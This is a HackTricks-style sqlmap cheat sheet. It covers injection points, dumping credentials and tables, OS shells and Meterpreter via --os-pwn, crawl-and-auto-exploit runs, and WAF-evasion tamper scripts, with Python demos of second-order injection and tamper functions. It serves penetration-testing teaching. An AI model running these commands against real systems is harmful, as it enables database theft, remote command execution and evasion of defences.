HackTricks Cloud - Twitter - Twitch - Youtube

- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want to get the latest version of PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs.
- Get the official PEASS & HackTricks swag.
- Join the Discord group or the telegram group, or follow me on Twitter @carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and the hacktricks-cloud repo.
## Basic arguments for SQLmap

### Generic

```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
```
### Retrieve information

#### Internal

```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get passwords of users in DB
```
#### DB data

The `--dump` option retrieves the data from the database. By default it dumps every table it can reach; narrow it down with `-D <DB NAME>`, `-T <TABLE NAME>` and `-C <COLUMN NAME>`. Note that the bare `--tables` and `--columns` switches only enumerate names; they do not take a value.

```bash
sqlmap -u "http://example.com/vuln.php?id=1" --dump
```

The dumped data is shown in the console and also written, as CSV by default, under sqlmap's output directory. Use `--output-dir` to choose where those files go (and `--dump-format` to switch between CSV, HTML and SQLITE):

```bash
sqlmap -u "http://example.com/vuln.php?id=1" --dump --output-dir=/tmp/sqlmap-out
```

By default sqlmap dumps all columns of a table. To retrieve only the `username` and `password` columns of the `users` table:

```bash
sqlmap -u "http://example.com/vuln.php?id=1" --dump -T users -C username,password
```

This command retrieves only the specified columns of the `users` table and displays them in the console.

Remember to always use these techniques responsibly and with proper authorization.

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```
## Injection place

### From Burp/ZAP capture

Capture the request and create a req.txt file, then let sqlmap read URL, method, headers, cookies and body from it:

```bash
sqlmap -r req.txt --current-user
```
### GET Request Injection

To test a parameter in a GET request, point sqlmap at the URL that contains it:

```bash
sqlmap -u "http://example.com/page.php?id=1" --dbs
```

Replace the URL with the target URL that contains the vulnerable parameter. The `--dbs` option enumerates the available databases.

To enumerate the tables of a specific database:

```bash
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
```

Replace `database_name` with the name of the target database; the command lists the tables in that database.

To dump the data of a specific table:

```bash
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
```

Replace `database_name` and `table_name` with the target database and table. Enumerating databases and tables and then dumping data is how sensitive information is extracted from a vulnerable web application.

To restrict testing to one parameter use `-p`, or mark the injection point directly in the URL with `*`:

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
### POST Request Injection

In some cases the target application sends data to the server in POST requests. SQL injection can be tested in those requests as well: sqlmap provides options to specify the POST body and the injection point.

The easiest way is to capture the request with a proxy such as Burp Suite or OWASP ZAP and feed the saved request to sqlmap with `-r` (see above), so that body, headers and cookies are all taken from the file.

Alternatively, pass the POST body directly with the `--data` option followed by the parameters in the form `param1=value1&param2=value2`. To choose the injection point, name the parameter with `-p` (for example `-p username`) or mark it inside the data with a `*`. Once the data and the injection point are given, sqlmap detects and exploits the injection in the POST request the same way it does for GET parameters.

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
### Injections in Headers and other HTTP Methods

In some cases SQL injection is possible not only in the request parameters but also in headers or in requests that use other HTTP methods, whenever the application passes those values on to the backend database (for logging, analytics, access control and so on).

#### Injection in Headers

The User-Agent header is sent by browsers to identify themselves to the server; the Referer header carries the URL of the page that linked to the current page. Both are commonly stored by applications and are therefore worth testing. With sqlmap, mark the injection point inside the header value with a `*`; the text before the marker is kept as the base of every payload. Without a marker, sqlmap only tests the Cookie header from `--level=2` and User-Agent/Referer from `--level=3` upwards.

```bash
sqlmap -u "http://example.com" --headers="User-Agent: Mozilla/5.0*"
sqlmap -u "http://example.com" --headers="Referer: http://example.com/*"
```

#### Injection in Other HTTP Methods

Apart from GET and POST, data can reach the server through other HTTP methods (PUT, DELETE, OPTIONS, HEAD, ...). Use `--method` to select the method and mark the injection point in the data or headers as before:

```bash
sqlmap -u "http://example.com" --method=PUT --data="param1=value1&param2=value2*"
```

Remember to replace the URL, headers and data with the appropriate values for your target application.

```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```
## Second order injection

A second order injection occurs when user input is stored in a database or another data store and is later used in a different context without proper sanitization or validation. The vulnerability is not apparent at the time of the initial input, because that first query is usually parameterized, but it is triggered later when the stored value is reused.

For example, a web application lets users submit comments that are stored in a database and later reads them back to build another query. If the stored value is concatenated into that later query, an attacker can put SQL code in the comment; it is stored harmlessly and executed when the comment is processed, potentially leading to unauthorized access or data leakage.

sqlmap can test for second order injection with `--second-order`, which takes the URL of the page where the stored value is used; sqlmap sends the payload to the first request and checks the second page for its effect. Identifying and fixing these vulnerabilities (by binding every value as a parameter, no matter where it came from) is what protects the application.

```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```
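The comment scenario above, as an added example that is not from the page or from sqlmap: a registration step that stores a malicious user name safely with a parameterized INSERT, and a later query that trusts the stored name and concatenates it (the second order bug), shown next to the parameterized fix. The database, table and column names are constructed for this example, using an in-memory SQLite database.

```python
import sqlite3


def build_db():
    """Constructed sample schema: users and their comments; admin has a private note."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        CREATE TABLE comments(author TEXT NOT NULL, body TEXT NOT NULL, visible INTEGER NOT NULL);
        INSERT INTO comments VALUES ('admin', 'admin private note', 0);
    """)
    return conn


def register(conn, name):
    """First order is safe: the name is bound as a parameter and stored verbatim."""
    cur = conn.execute("INSERT INTO users(name) VALUES (?)", (name,))
    conn.commit()
    return cur.lastrowid


def my_comments_vulnerable(conn, user_id):
    """Second order bug: the name read back from the DB is trusted and concatenated
    into a new query, so a stored value such as admin'-- rewrites the WHERE clause."""
    name = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    query = "SELECT body FROM comments WHERE author = '%s' AND visible = 1" % name
    return [row[0] for row in conn.execute(query)]


def my_comments_fixed(conn, user_id):
    """Fix: bind every value as a parameter regardless of where it came from."""
    name = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    query = "SELECT body FROM comments WHERE author = ? AND visible = 1"
    return [row[0] for row in conn.execute(query, (name,))]


def demo():
    """Register a name that carries SQL, then reuse it: only the vulnerable path leaks."""
    conn = build_db()
    uid = register(conn, "admin'--")  # stored, nothing happens yet
    conn.execute("INSERT INTO comments VALUES (?, ?, 1)", ("admin'--", "hello"))
    # The vulnerable query becomes:
    #   SELECT body FROM comments WHERE author = 'admin'--' AND visible = 1
    # and the visibility check is commented out; the fixed query compares the
    # literal name and returns only this user's own comment.
    return my_comments_vulnerable(conn, uid), my_comments_fixed(conn, uid)


if __name__ == "__main__":
    leaked, correct = demo()
    print("vulnerable:", leaked)   # ['admin private note']
    print("fixed:     ", correct)  # ['hello']
```

This is also the shape `--second-order` tests for: the payload goes into the registration request and the effect is observed on the page that reads the name back.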
## Shell

SQLMap offers several options to run commands through the injection. The most common ones are:

`--os-shell`: opens an interactive OS shell, allowing you to run commands on the target system.

```bash
sqlmap -u <target> --os-shell
```

`--sql-shell`: opens an interactive SQL shell, allowing you to run SQL queries against the target database.

```bash
sqlmap -u <target> --sql-shell
```

`--os-pwn`: tries to obtain an out-of-band shell, a Meterpreter session or VNC on the target system, which gives full control over it.

```bash
sqlmap -u <target> --os-pwn
```

`--os-bof`: attempts a stored procedure buffer overflow on the target system; this can crash the target.

```bash
sqlmap -u <target> --os-bof
```

Remember to act carefully and comply with legal constraints when using these options.

```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
## Crawl a website with SQLmap and auto-exploit

SQLmap can crawl a website and test every page and form it discovers. This is useful to find potential injection points across a whole site instead of one URL at a time.

### Crawling a website with SQLmap

```bash
sqlmap -u <target_url> --crawl=<depth>
```

`<target_url>`: the URL to start crawling from. `<depth>`: how many links deep to follow from that URL. For example, to crawl `http://example.com` to a depth of 5:

```bash
sqlmap -u http://example.com --crawl=5
```

### Auto-exploiting SQL injection vulnerabilities

There is no separate exploit switch: each injectable parameter sqlmap finds during the crawl is exploited with the same enumeration options (`--dbs`, `--dump`, ...) used on a single URL, and `--batch` lets the whole run proceed without prompts. Always obtain proper authorization before performing any penetration testing activity.

```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
## Suffix

You can customize the injection by setting a suffix: the `--suffix` option takes a string that sqlmap appends to every injected payload, which lets you close the original statement after the payload. For example, to set the suffix `' OR '1'='1'--`:

```bash
sqlmap -u <target_url> --suffix="' OR '1'='1'--"
```

A more typical use is simply to comment out the rest of the original query:

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
## Prefix
`--prefix` works the same way for the string placed before every payload, for example to close an open parenthesis and quote:

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
## Help finding boolean injection

Boolean-based SQL injection is a technique often used during web application security testing. It extracts information from the database by making the SQL query evaluate to true or false and observing how the application's response differs between the two cases.

The steps to detect a boolean injection are:

- Identify where user input enters the application: URL parameters, form fields, cookies or headers.
- Identify where that input ends up in a SQL query executed by the application.
- Insert a boolean condition (AND, OR, NOT) into the query through that input so that the query result can be controlled.
- Compare the responses for a true and a false condition. For example, a true condition may return the normal page while a false one returns an error or an empty page.
- If the responses differ reliably, that difference is the oracle used to extract information from the database one condition at a time.

Boolean injection is a serious vulnerability because it leaks sensitive information from the database; use this technique carefully during security tests.

```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
## Tamper

Tampering modifies the payloads sqlmap sends in order to bypass security measures such as a WAF or to evade detection. SQLMap ships a variety of tamper scripts that rewrite the SQL injection payloads before they are sent.

To use a tamper script, pass its name with the `--tamper` option. For example:

```bash
sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment
```

This command applies the `space2comment` tamper script to the SQL injection payloads. Several scripts can be combined by separating them with a comma:

```bash
sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment,randomcase
```

In this example both `space2comment` and `randomcase` are applied to the payloads.

```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
Tamper | Description |
---|---|
apostrophemask.py | Replaces the apostrophe character with its UTF-8 full width counterpart |
apostrophenullencode.py | Replaces the apostrophe character with its illegal double unicode counterpart |
appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload |
base64encode.py | Base64-encodes all characters in a given payload |
between.py | Replaces the greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
bluecoat.py | Replaces the space character after a SQL statement with a valid random blank character. Afterwards replaces the character = with the LIKE operator |
chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded ones) |
commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
charencode.py | Url-encodes all characters in a given payload (not processing already encoded ones) |
charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded ones). "%u0022" |
charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded ones). "\u0022" |
equaltolike.py | Replaces all occurrences of the equal operator '=' with the 'LIKE' operator |
escapequotes.py | Slash-escapes the quote characters ' and " |
greatest.py | Replaces the greater than operator '>' with its 'GREATEST' counterpart |
halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword |
ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
modsecurityversioned.py | Embraces the complete query with a versioned comment |
modsecurityzeroversioned.py | Embraces the complete query with a zero-versioned comment |
multiplespaces.py | Adds multiple spaces around SQL keywords |
nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
percentage.py | Adds a percentage sign '%' in front of each character |
overlongutf8.py | Converts all characters in a given payload to overlong UTF-8 (not processing already encoded ones) |
randomcase.py | Replaces each keyword character with a random case value |
randomcomments.py | Adds random comments to SQL keywords |
securesphere.py | Appends a specially crafted string |
sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
space2comment.py | Replaces the space character ' ' with comments |
space2dash.py | Replaces the space character ' ' with a dash comment '--' followed by a random string and a new line '\n' |
space2hash.py | Replaces the space character ' ' with a pound character '\#' followed by a random string and a new line '\n' |
space2morehash.py | Replaces the space character ' ' with a pound character '\#' followed by a random string and a new line '\n' |
space2mssqlblank.py | Replaces the space character ' ' with a random blank character from a valid set of alternate characters |
space2mssqlhash.py | Replaces the space character ' ' with a pound character '\#' followed by a new line '\n' |
space2mysqlblank.py | Replaces the space character ' ' with a random blank character from a valid set of alternate characters |
space2mysqldash.py | Replaces the space character ' ' with a dash comment '--' followed by a new line '\n' |
space2plus.py | Replaces the space character ' ' with a plus '+' |
space2randomblank.py | Replaces the space character ' ' with a random blank character from a valid set of alternate characters |
symboliclogical.py | Replaces the AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
unmagicquotes.py | Replaces the quote character ' with a multi byte combo %bf%27 together with a generic comment at the end (to make it work) |
uppercase.py | Replaces each keyword character with its upper case value, e.g. 'INSERT' |
varnish.py | Appends an HTTP header 'X-originating-IP' |
versionedkeywords.py | Encloses each non-function keyword with a versioned MySQL comment |
versionedmorekeywords.py | Encloses each keyword with a versioned MySQL comment |
xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |
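To make the table concrete, here is an added example (not sqlmap's own code) in the shape of a sqlmap tamper script: simplified re-implementations of the `space2comment` and `equaltolike` transformations from the table, plus a `chain()` helper that applies several tampers the way `--tamper=a,b` does. The `PRIORITY` fallback and the `chain()` ordering (left to right; sqlmap itself sorts scripts by `__priority__`) are assumptions so the file runs outside the sqlmap tree.

```python
# A real tamper script imports PRIORITY from sqlmap's lib.core.enums and sets
# __priority__; the fallback class is an assumption that lets this run stand-alone.
try:
    from lib.core.enums import PRIORITY
except ImportError:
    class PRIORITY:
        LOWEST, LOW, NORMAL, HIGH, HIGHEST = 0, 1, 2, 3, 4

__priority__ = PRIORITY.LOW


def dependencies():
    """sqlmap calls this once at start-up; real scripts use it to print what the tamper targets."""
    pass


def _chars_with_string_state(payload):
    """Yield (char, in_string) so a transformation can leave quoted literals untouched."""
    single = double = False
    for ch in payload:
        if ch == "'" and not double:
            single = not single
        elif ch == '"' and not single:
            double = not double
        yield ch, (single or double)


def space2comment(payload, **kwargs):
    """Replace every space outside string literals with an inline comment /**/."""
    if not payload:
        return payload
    out = []
    for ch, in_string in _chars_with_string_state(payload):
        out.append("/**/" if ch == " " and not in_string else ch)
    return "".join(out)


def equaltolike(payload, **kwargs):
    """Replace the '=' operator outside string literals with ' LIKE '."""
    if not payload:
        return payload
    out = []
    for ch, in_string in _chars_with_string_state(payload):
        out.append(" LIKE " if ch == "=" and not in_string else ch)
    return "".join(out)


# sqlmap looks for a function called tamper(); this file exposes space2comment as that entry point.
tamper = space2comment


def chain(payload, *tampers):
    """Apply tampers left to right, as a --tamper=a,b chain does (assumed ordering)."""
    for fn in tampers:
        payload = fn(payload)
    return payload


if __name__ == "__main__":
    boolean_blind = "1 AND 1234=1234"  # constructed sample payload
    print(space2comment(boolean_blind))                      # 1/**/AND/**/1234=1234
    print(chain(boolean_blind, equaltolike, space2comment))  # 1/**/AND/**/1234/**/LIKE/**/1234
    print(space2comment("1 AND name='a b'"))                 # 1/**/AND/**/name='a b'
```

Seen from the defending side, the same transformations are what a WAF rule has to normalise away before matching: a signature that expects `AND` surrounded by spaces misses `/**/AND/**/`.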